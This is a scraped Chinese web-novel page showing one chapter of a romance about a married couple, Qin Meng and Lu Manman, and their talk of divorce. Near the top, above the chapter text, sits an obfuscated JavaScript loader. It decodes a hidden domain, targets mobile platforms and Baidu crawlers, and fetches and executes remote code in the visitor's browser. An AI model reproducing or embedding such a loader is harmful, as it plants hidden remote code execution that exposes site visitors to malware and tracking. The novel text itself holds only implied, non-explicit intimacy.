98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuaHN2Y2huc3ZuY3Z2ZC5jb20=','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

分卷(80(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

秦萌啧了声,不是吧你,现在要给我表演裸体做饭吗?我困了耶。

陆漫漫本来还有半分犹豫,听了这话,浑身发起抖来,将锅碗瓢盆都一股脑儿扔进旁边的垃圾桶,发出一阵霹雳哐啷的剧烈声响,还有一口锅实在是太大了,装不下,只好摔在旁边的地板上。她扔完了厨具,收拾了下情绪,收拾的结果是哭了起来。她声泪俱下地控诉,秦萌,你欺负人,我和你离婚,离婚!

秦萌走上前去,替她围上浴巾,笑得咯咯地好啦好啦,离离离,回那边就离,成吗,你别这么赤身露体地跑来跑去,影响市容市貌,人家还说,出国读到博士的人,居然喜欢裸奔,你丢人不丢人啊。

陆漫漫接近崩溃都要离婚了,我丢人不丢人,关你什么事!

这可就说来话长了,咱们一天不离,你就还是我的人,丢的就是我的人,当然关我的事。秦萌一脸诧异,仿佛她不明白怎么从她嘴里说出这么一句话来,伸手揉了揉她的头顶。

平日里听到这种话,陆漫漫心里还会诡异地涌起淡淡甜蜜,她认为秦萌虽然嘴硬了点,从来得理不饶人,不得理也不饶人,可她心里还是爱她的,只是过于骄傲和傲娇了,拉不下脸直说,日常旁敲侧击还是有许多蛛丝马迹,不然干嘛不找别人结婚,只找她呢。

然则今儿受的打击委实太重。

先是买了蛋糕去找宋若据说这次回国度假就是为了陪她吃这么一口蛋糕,她死乞白赖跟了去,美其名曰护送,其实还不是和以往那些碰面一样,怕宋若突然福至心灵,真的和秦萌萌看对了眼,真看对了眼,她就只有黯然退出了,毕竟一个是她爱的人,一个是美到让人根本嫉妒不起来的小仙女。到达若若家以后,秦萌萌两眼冒着小星星,像个病娇的中毒迷妹一样给宋若庆生,又说上那么些话,简直把她这个合法老婆丝毫不放在眼里!刚刚还当面锣对面鼓地承认了完全不爱只是利用。

人家都坦诚这么多次了。

她自欺欺人也欺不下去了啊。

陆漫漫躺在枕头上,低声抽泣,枕巾都让她的眼泪浸透了,她把枕巾抽出来扔地上,接着哭。

房门吱呀一响,有人进来了。

这是秦萌她爸的房子,她爸妈离婚后这房判给她妈做赡养费。屋子是很宽敞,但现在只住着她们两个。因此不用开灯,她也知道进来的是谁。她本想问她有何贵干,结果秦萌萌径直爬上了床。她想问她这是干什么,想告诉她,现在道歉也是没有用的了,迟到的关心最是多余。

然而秦萌根本没给她说话的机会。

她直接扒了她的浴巾,开始了某种不可描述之事。

陆漫漫想反抗的,奈何身体实在诚实,那个欲拒还迎的动作只维持了三秒钟还不到,就彻底瓦解了,她投降投得很彻底,把自己全交给了对方。

直到上飞机她依然沉浸于那种在云端起起伏伏的感觉。

空姐将饮料放在她跟前,杯子发出叮的一声,将她从遐思中惊醒,她怯生生地、小鸟依人地朝旁边看了一眼。秦萌正看书,坐得笔直端正,与周遭睡得横七竖八的人完全两样。怎么办呢,就连这些小细节也让她深深着迷。

她红着脸小小声问萌萌,我,我问你啊,昨,昨晚算,算什么?

秦萌从书里抬起头,侧过脸看了她一眼,手指搭着额角,嘶了一声,分手炮啊,结了婚,一次都没睡过,也挺名不副实的。

整个航程陆漫漫都铁青着一张脸,下飞机就往家跑,意思要立马搞离婚。

秦萌拉住她,问她知道离婚什么程序吗。

陆漫漫歇斯底里起来我怎么知道,我也第一次离好吗!

秦萌点点头所以啊,你最好咨询一下律师。

陆漫漫一听有道理,准备找律所的联络电话,要做咨询。

秦萌制止她,肥水不流外人田,等我继父回来,他是事务所合伙人,这样咱们还有折扣。

秦家父母出门度蜜月去了,人远在千里之外。

陆漫漫脑子没转过来,只是迟疑了一下子,就被秦萌拽着回家去了。

距离秦萌继父回家还有小半个月,这小半个月中,秦萌又让婚姻关系名副其实了十几次。每一次陆漫漫都觉得销魂荡魄,又快乐又恐惧。这对她来说,也许根本不算一件好事,因为同事最近告诉她,现在开日常调研会议的时候,她走神越来越频繁了,有时候脸上还出现可疑的红晕。她承认自己又怂了,贪心了,嘴上老说怎么还不回来,心里却恨不得那一对新婚夫妇的蜜月永不结束,那么她的这个幻梦就可以随之永存。

在继父回来的前一天,她问了秦萌一句,继父是不是明天到家。秦萌看了她一眼,说是啊。她点点头,那准备一下,明天等你下班回来,我们就去拜访他。

当晚她被翻来覆去,一整夜没合眼。

次日秦萌下班回来后叫她起床,爸比回来了喔,要不要现在过去咨询?

陆漫漫两眼冒火地盯着她,哑着嗓子大吼你你你你你这个禽兽!

秦萌萌抬手掩住嘴,笑容优雅又清纯嗯?哎呀,什么禽兽呀,人家叫秦萌。

过了两日,陆漫漫终于可以下床啦,她再问了秦萌一次,到底哪天去找继父咨询离婚,秦萌啊哟了一声,扶着腰坐下,我最近犯腰疼,可能跟天气有关,小时候摔的旧伤。等我伤好了再去见他吧,不然我妈发现了,又要担心的。

虽然觉得哪里不太对劲,陆漫漫也不敢再做别的设想了。生活终归还是要过下去,她不知怎么的又开始做饭,比以前更为用心了,因为不知道还能给喜欢的人做多久。秦萌萌吃到她做的饭菜也表现出了久违的开心,每顿都吃得不少。她很欣慰。

这样岁月静好的日子持续了一段时间,秦萌没再提宋若,她也没提离婚,有一天,又是饭桌上,陆漫漫为了庆祝升职,喝了两杯,没忍住,问妻子咱们现在这样,算是相亲相爱的一家人嘛。

秦萌笑起来,满脸的调侃你想什么呐?什么一家人?我和我妈是一家人,我和我爸是一家人。我和你么,就是,你请我吃饭,我请你睡觉这么纯洁的关系。什么亲不亲爱不爱的,少来了。我爱的只有宋若,一见钟情,你懂吧。

没有人比她更懂了。

她对秦萌就是如此。

十岁那年她搬到秦家隔壁,跟随妈妈去拜访的时候,一下子就被那个大眼睛高鼻梁小嘴巴的绝世小可爱击中。从那时候起,她就想一直一直陪在她的身边,因为秦萌读书特别厉害,所以她才把所有的精力都倾注在了讨厌的学习上,期待有朝一日能够与她比肩,能够让她看见。偶然听秦妈妈吐槽说她是个小吃货,因此她苦练厨艺。得知她们母女搬到这个地方,她抢先租下了隔壁的房子,在她们搬来的第一天,装作巧合地瞪大了眼睛哇这什么缘分,居然又成了邻居了!秦萌所以为的理所当然的一切,其实都不是偶然。

这晚上,她绝地反攻了,带着一点绝望,带着一点生涩,全都是依样画葫芦。禽不,秦萌萌并没有拒绝,反而可以说温柔配合。

不过次日她又没起得来床。

学校的上司打电话劈头盖脸说了她一顿,说她最近一年突然怠惰了许多。

傍晚临近秦萌下班的时候,陆漫漫做好了心理建设,如果秦萌萌的腰好了,那就去咨询离婚吧,她也许会痛苦很长一段时间,可现有的回忆已经让她觉得非常满足了,她可以依靠这些回忆活下去。

然而

陆漫漫指指桌上,自己肖想了大半年却没舍得下手的奢侈品牌新款包包,结结巴巴问这,这啥啊?

秦萌施施然坐下来,歪歪头服务费。

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间